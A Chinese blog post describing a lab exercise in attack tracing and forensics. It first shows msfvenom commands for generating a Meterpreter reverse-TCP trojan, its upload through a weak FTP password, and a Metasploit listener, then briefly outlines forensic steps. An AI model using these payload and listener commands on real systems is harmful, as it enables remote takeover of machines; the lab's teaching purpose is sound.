简单的溯源取证

于 2024-03-18 14:50:43 发布
阅读量507 收藏 7
点赞数 3
文章标签: 安全 网络安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_56306210/article/details/136809271
版权

环境准备:

Linux虚拟机:内网部署蜜罐探测系统 。(192.168.XX.XX)

windows虚拟机:有FTP弱口令漏洞的web服务 (受害机器) (192.168.125.134)

kali Linux虚拟机:攻击机服务端 。 (192.168.125.130)

MAC:管理员电脑。(192.168.XX.XX)

一、利用kailiLinuxmsf生成windows木马文件

生成 Payload: 使用 msfvenom 来创建木马payload。例如,创建一个windows/meterpreter/reverse_tcp payload:

msfvenom -p windows/meterpreter/reverse_tcp LHOST=<你的监听IP地址> LPORT=<你的监听端口> -f exe > /path/to/your_malware.exe

替换 <你的监听IP地址> 和 <你的监听端口> 为你的实际IP地址和端口。选择一个端口号,如 4444,并确保该端口在你的防火墙中是开放的。

利用windows设定到FTP弱口令上传木马文件,并执行木马程序.

设置 Metasploit 监听器

配置 exploit/multi/handler: 在msfconsole中,设置一个监听器来捕获反向连接:

use exploit/multi/handler
set payload windows/meterpreter/reverse_tcp
set LHOST <你的监听IP地址>
set LPORT <你的监听端口>
exploit -j -z

运行m.exe

二、利用msf工具远控windows主机对内网C段进行扫描

简单的信息搜集

利用fscan工具进行内网资产探测

蜜罐系统收到告警

二、对Windows机进行溯源

进程工具下载

Sysinternals 实用工具 - Sysinternals | Microsoft Learn

溯源取证思维导图

一、首先查看杀毒软件日志

定位到病毒位置

二、要是没有杀毒软件

查看异常进程

找到病毒文件

三、沙箱分析

咩了个咩咩
关注
  • 3
    点赞
  • 7
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 0
    评论
网络攻防--溯源取证分析实验
qq_64389397的博客
01-07 1626
splfileobject是PHP5中新加入的一个文件访问类,它继承于php标准库(SPL)中的Iterator和SeekableIterator接口,并提供了对文件的高效访问和处理。通过导出http对象,查看http的流量交互对象,可以看到在后面的分组中,主要是与1.php进行流量交互,可以确定1.php就是攻击者上传的shell文件。在日志文件中查找tmp,发现一串URL编码的数据,进行解密,发现黑客通过filename参数向/tmp目录传递了一个sess_car文件。然后就可以查看https协议了。
溯源取证 - windows内存取证 - 中级
weixin_48421613的博客
06-07 2219
此篇文章,我们将学习windows内存取证技巧,包括学习windows内存取证常用目录文件、使用到的取证工具,技巧;
溯源取证/应急排查
qq_44657899的博客
11-16 2204
文件取证 powershell历史 存放了powershell的执行历史 %APPDATA%\Microsoft\Windows\PowerShell\PSReadLine\ConsoleHost_history.txt JumpLists 记录用户最近使用的文档和应用程序,方便用户快速跳转到指定文件,可用于寻找可疑文件,排查木马病毒。 位置: %APPDATA%\Microsoft\Windows\Recent %UserProfile%\Recent # 查询: dir %APPDATA%\Mic
网络攻防技术——溯源取证与分析实验
学习记录
02-28 6580
一、题目 溯源取证分析作为网络攻防过程中重要环节,准确找到攻击者的入侵线索(尤其是攻击突破口、攻击IP地址、域名、工具等信息),对于企业或者团队安全运营团队来说都是必备技能。常规攻击取证过程中往往会结合流量、Web访问日志、终端系统或者软件日志等信息来挖掘或者推断相关线索。本实验通过网络流量、日志等溯源环境进行真实案例模仿,通过实战化分析来锻炼学生的取证溯源能力,从而加深大家对于网络攻防的实战化水平。在本实验结束时,学生应该能够具备对网络流量和日志的基本分析能力。 二、过程 一、Webshell数据包(we
如何在溯源中使用网络取证技术?
图幻未来的博客
01-31 922
随着互联网的普及和恶意活动的增多, 网络溯源成为了网络安全领域的一项重要任务. 本文将介绍几种常用的网络取证技术在网络溯源中的应用及其优势和局限性, 并探讨如何通过结合多种技术手段来提高网络溯源的效果.
溯源取证-流量分析 中级难度的资源
05-30
【标题】:“溯源取证-流量分析 中级难度的资源”主要涵盖了网络安全领域中的高级技术,旨在帮助用户深入了解网络流量分析和电子取证。这些资源对于网络安全专业人员或对网络安全有兴趣的学者来说是极其宝贵的。 ...
面向溯源取证的网络攻击工具痕迹分析技术与实现_何尾风.pdf
09-09
【摘要】中提到的面向溯源取证的网络攻击工具痕迹分析技术与实现,是针对网络安全领域的一个重要课题。随着互联网的普及,高级持续性威胁(APT)攻击成为了网络安全的重大威胁。这些攻击具有高度隐蔽性、长期性和...
大数据安全取证溯源技术.pptx
最新发布
05-19
### 大数据安全取证溯源技术 #### 一、大数据取证溯源的内涵与意义 - **大数据取证**:指的是在海量、复杂的数据集中利用大数据分析技术进行证据收集的过程。其核心在于通过技术手段从大数据中筛选出有价值的...
数据溯源实验数据
01-16
根据提供的文件信息,我们可以深入探讨数据溯源模型及其与OPM模型的关系,并且解析该模型中的组件及组件间的映射关系。 ### 数据溯源模型 #### 定义与意义 数据溯源,也称为数据世系(Data Provenance),是指追踪...
可意识溯源的入侵检测和取证分析的结合方法
04-06
可意识溯源的入侵检测和取证分析的结合方法
2020年全国职业院校技能大赛改革试点赛(中职组)
5L2g556F5ZWl77yf
10-17 5703
为赛卷一,环境都是自己做的,仅作参考 网络安全竞赛试题 (一)(总分100分) 赛题说明 一、竞赛项目简介 “网络安全”竞赛共分A. 基础设施设置与安全加固;B. 网络安全事件响应、数字取证调查和应用安全;C. CTF夺旗-攻击;D. CTF夺旗-防御等四个模块。根据比赛实际情况,竞赛赛场实际使用赛题参数、表述及环境可能有适当修改,具体情况以实际比赛发放赛题为准。竞赛时间安排和分值权重见表1。 表1 竞赛时间安排与分值权重 模块编号 模块名称 竞赛时间 (小时) 权值 A 基础设施设置与安全加固 3
游戏黑灰产识别和溯源取证
ss810540895的博客
08-14 2773
游戏黑灰产的对抗工作,不是简单的一环,而是一个完整的产业链。开发各类黑灰产工具,具备一定的研发能力,大多使用Python、Lua、易语言、按键精灵、TC脚本,有较强的反侦查和反检测能力,并且都具有固定的中游销售渠道(代理或内部工作室),多为兼职人员。溯源处理,通过对游戏登录的用户信息,用户的设备信息,用户游戏中的行为等数据,对这些数据进行做加工,进行情报溯源处理。溯源处理,通过对游戏登录的用户信息,用户的设备信息,用户游戏中的行为等数据,对这些数据进行做加工,进行情报溯源处理。6、批量行为都是有迹可循的。
溯源取证-钓鱼取证 基础篇
weixin_48421613的博客
04-05 978
某钱包用户遭遇钓鱼攻击,攻击者​利用钓鱼页面获取用户钱包助记词,钱包助记词通常为12个字符串组成,是用来重置/找回用户密码用的。
【实战学习】电子数据取证专题——网络数据分析溯源(下)
weixin_34138377的博客
03-14 587
网络数据分析溯源(新增用户的×××号)背景介绍某公司安全工程师抓取到一段Wireshark数据包,发现有人利用WebShell操作了数据库,请找到新增的用户的×××号。实训目标1、掌握“Wireshark”的基本使用方法;2、了解数据在网络中传输的过程和协议;靶场地址:https://www.mozhe.cn/bug/detail/146网络数据分析溯源(发布文章的IP地址)...
windows溯源取证,应急响应案例:tryhackme之 Investigating Windows
qq_43200143的博客
04-13 4504
文章目录Investigating WindowsWhats the version and year of the windows machine?Which user logged in last?When did John log onto the system last?What IP does the system connect to when it first starts?What two accounts had administrative privileges (other than
LOG日志溯源取证总结
weixin_30273931的博客
07-01 1290
windows操作系统事件日志 C:\Windows\System32\winevt\Logs\ *(XPC:\Windows\System32) 应用程序日志 App Event.Evtx(Application.evtx) 安全日志 SecEvent.Evtx 系统日志 SysEvent.Evtx USB设备第一次连接电脑:setupapi.log Win...
一次溯源过程
Matthew
04-18 5379
记录一下一次溯源的过程:当时某个客户说网站遇到劫持的情况。要求我们来看看,但是由于某些原因,看不到服务器上的内容,只能够获取日志进行溯源。 看到日志是2017-04-01上传文件,然后搜索关键字upload,因为一般上传的webshell都会存在于upload某个文件夹下面,然后在又看到有eval这个函数的出错,所以大概知道箭头指示的那句话为一句话木马。 访问木马:
【实战学习】电子数据取证专题——网络数据分析溯源(上)
mozhe_的博客
03-04 3454
电子数据取证专题-网络数据分析溯源 新题来了!!! 网络取证对网络入侵事件、网络犯罪活动进行证据获取、保存、分析和还原,它能够真实、连续地获取网络上发生的各种行为;能够完整地保存获取到的数据,并且防篡改;对保存的原始证据进行网络行为还原,重现入侵现场。 网络数据分析溯源(爆破扫描的IP地址) 背景介绍 某公司安全工程师抓取到一段Wireshark数据包,其中一IP对目标服务器做爆破扫描攻击扫...
围绕信息隐藏的应用,对新型数据泄密溯源取证进行分析及讨论。
06-10
新型数据泄密溯源取证是指通过技术手段对数据泄密事件进行溯源取证,以确定泄密事件的发生、泄密信息的内容、泄密者的身份等信息。在信息隐藏技术被用于泄密时,传统的取证方法已经无法满足需求,因此需要开发新型...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

咩了个咩咩

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值